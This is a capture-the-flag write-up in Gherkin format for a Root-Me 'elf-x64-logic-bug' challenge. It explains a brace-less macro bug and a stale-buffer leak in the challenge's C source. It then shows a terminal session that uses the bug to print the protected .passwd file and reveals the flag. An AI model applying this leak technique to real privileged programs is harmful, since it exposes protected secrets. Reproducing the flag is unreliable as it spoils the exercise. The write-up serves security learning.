## Version 2.0
## language: en

Feature: elf-x64-logic-bug
  Site:
    rootme
  Category:
    app-system
  User:
    M'baku
  Goal:
    read the password

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04     |
  Machine information:
    Given I am accesing the challenge through its URL
    When I visit the link
    Then I see a description with the statement
    """
    glibc indirect weakness and common bug
    """
    Then a program source code is delivered
    And indicates that all the protections are activated

  Scenario: Sucess:Finding the bugs
    Given I read the source code
    Then I noticed strange behavior in the function
    """
    static void
    display_shifted_file_content(void)
    {
      FILE *fp = NULL;
      char *filename = NULL, *filename_alloc = NULL;
      unsigned char b;
      char *buf = NULL;
      size_t buf_len = 0;
      struct stat st;

      printf("Please enter the file name to display in shift mode: ");
      filename = get_string_from_user();

      if (NULL == (fp = safe_fopen(filename))) {
        printf("Failed to open \"%s\"\n", filename);
        goto end;
      }

      allocate_file_content(fileno(fp), &buf, &buf_len);
      if (buf_len > CONTENT_SIZE)
        buf_len = CONTENT_SIZE;

      printf("What value would you add to each byte of the content: ");
      b = get_integer_from_user();

        /* do not display files in temporary dir, to avoid possible garbage
         * since it's often a sticky dir where people tend to put anything
         * in, especially on a challenge box;  other people with the same
         * user id could be tempted to mess around */
      if (NULL == (filename_alloc = realpath(filename, NULL))) {
        perror("realpath");
        goto end;
      }

      if (NULL != strstr(filename_alloc, TMPDIR)) {
        puts("Temporary directories are forbidden.");
        goto end;
      }

      if (fstat(fileno(fp), &st) < 0) {
        perror("fstat");
        goto end;
      }

      if (getuid() != st.st_uid) {
        puts("Not a file we own.");
        goto end;
      }

      if (NULL != strstr(filename_alloc, HOMEDIR))
        display_shift(fp, buf, buf_len, b);

    end:
      free(filename_alloc);
      free(buf);
      if (fp)
        fclose(fp);
    }
    """
    Then of analyzing it i noticed a macro that is not handled correctly
    """
    #define display_shift(fp, buf, len, b) read(fileno(fp), buf, len);
    for (size_t i = 0; i < len; i++) { printf("%c", (buf)[i] + b); }
    """
    Then this is undefined because the macro is extended in function
    And the compiler inserts the macro code at the location
    And which means that the expanded code will look more like:
    """
    if (NULL != strstr(filename, HOMEDIR))
      read(fileno(fp), buf, len);
    for (size_t i = 0; i < len; i++) { printf("%c", (buf)[i] + b); }
    """
    Then because of this i can take advantage of TOCTOU
    """
    Time Of Check Time Of Use
    """
    And as the HOMEDIR is checked after filling the buffer
    Then I can use the macro bug to leak data from the buff
    """
    (void) fgets(content, sizeof content, fp);

    if (NULL != strstr(filename, SECRET_FILE)) {
      printf("FORBIDDEN: \"%s\"\n", filename);
      goto end;
    }

    for (size_t i = 0; content[i] != '\n' && i < sizeof content; i++)
      printf("%c", content[i]);
    """

  Scenario: Sucess:Exploiting the bugs
    Given I recognize the bugs
    Then the plan is writing a file the same size as ".passwd"
    And trying read the file .passwd with the display_file_content function
    And shifted the bytes with 0 to dont alter the flag
    """
    app-systeme-ch6@challenge03:~$ python -c "print 'A' *32" > /dev/shm/x
    app-systeme-ch6@challenge03:~$ ./ch6

    =========================================================
    Choice:
      [1] Display file infos
      [2] Display file content (or its first line)
      [3] Display user infos
      [4] Display directory infos
      [5] Display a shifted content of a file
      [6] Exit program
    -> 2
    Please enter the file name: .passwd
    FORBIDDEN: "/challenge/app-systeme/ch6/.passwd"

    =========================================================
    Choice:
      [1] Display file infos
      [2] Display file content (or its first line)
      [3] Display user infos
      [4] Display directory infos
      [5] Display a shifted content of a file
      [6] Exit program
    -> 5
    Please enter the file name to display in shift mode: /dev/shm/x
    What value would you add to each byte of the content: 0
    BEw4r3_0f_Th3_BuffeR
    """
    And voila
